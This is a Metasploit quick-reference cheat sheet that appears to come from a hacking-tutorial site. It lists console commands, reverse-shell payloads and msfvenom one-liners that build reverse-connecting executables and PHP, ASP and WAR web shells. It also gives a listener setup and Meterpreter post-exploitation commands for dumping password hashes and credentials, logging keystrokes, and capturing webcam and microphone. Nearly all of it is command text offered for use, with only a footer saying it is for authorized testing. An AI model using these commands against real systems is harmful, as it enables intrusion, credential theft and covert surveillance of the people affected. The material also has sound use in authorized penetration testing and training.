Metasploit Quick Reference
Hackers Manifest - hackersmanifest.com
Quick Reference
Exploitation framework commands, payloads, and Meterpreter reference.
๐ Starting Metasploit
| Start console | msfconsole |
| Quiet mode | msfconsole -q |
| Init database | msfdb init |
| Start database | msfdb start |
| Check DB status | db_status |
| Run script | msfconsole -r script.rc |
| Update MSF | msfupdate |
๐ Basic Commands
| Search modules | search type:exploit smb |
| Search by CVE | search cve:2017-0144 |
| Use module | use exploit/windows/smb/... |
| Module info | info |
| Show options | show options |
| Set option | set RHOSTS 10.0.0.10 |
| Global set | setg LHOST 10.0.0.5 |
| Run exploit | exploit or run |
| Run as job | exploit -j |
| Go back | back |
๐ฃ Common Payloads
| Win x64 Meterpreter | windows/x64/meterpreter/reverse_tcp |
| Win x86 Meterpreter | windows/meterpreter/reverse_tcp |
| Linux Meterpreter | linux/x64/meterpreter/reverse_tcp |
| Windows Shell | windows/shell/reverse_tcp |
| PHP Meterpreter | php/meterpreter/reverse_tcp |
| Java Meterpreter | java/meterpreter/reverse_tcp |
Staged (/) = smaller, needs handler | Stageless (_) = larger, standalone
๐ป Meterpreter - System
| System info | sysinfo |
| Current user | getuid |
| Get PID | getpid |
| List processes | ps |
| Migrate to PID | migrate PID |
| Elevate privs | getsystem |
| Dump hashes | hashdump |
| Load Kiwi | load kiwi |
| All credentials | creds_all |
๐ Meterpreter - Files
| Working dir | pwd |
| Change dir | cd C:\\ |
| List files | ls |
| Read file | cat file.txt |
| Download | download file.txt /local/ |
| Upload | upload local.txt C:\\ |
| Edit file | edit file.txt |
| Search | search -f *.txt |
๐ Meterpreter - Network
| IP config | ipconfig |
| Routes | route |
| Port forward | portfwd add -l 8080 -p 80 -r IP |
| List forwards | portfwd list |
| ARP scan | run arp_scanner -r 10.0.0.0/24 |
| Route add | run autoroute -s 10.0.0.0/24 |
๐ญ Post-Exploitation
| Screenshot | screenshot |
| Start keylogger | keyscan_start |
| Dump keystrokes | keyscan_dump |
| Webcam snap | webcam_snap |
| Record mic | record_mic |
| Shell | shell |
| Background | background |
| Sessions list | sessions -l |
| Interact | sessions -i 1 |
๐งช msfvenom Payloads
| Windows EXE | msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f exe -o shell.exe |
| Linux ELF | msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f elf -o shell |
| PHP | msfvenom -p php/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f raw -o shell.php |
| ASP | msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f asp -o shell.asp |
| WAR | msfvenom -p java/jsp_shell_reverse_tcp LHOST=IP LPORT=4444 -f war -o shell.war |
| Python | msfvenom -p python/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f raw |
๐ก Multi Handler Setup
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 4444
exploit -jGenerated from Hackers Manifest | For authorized security testing only | hackersmanifest.com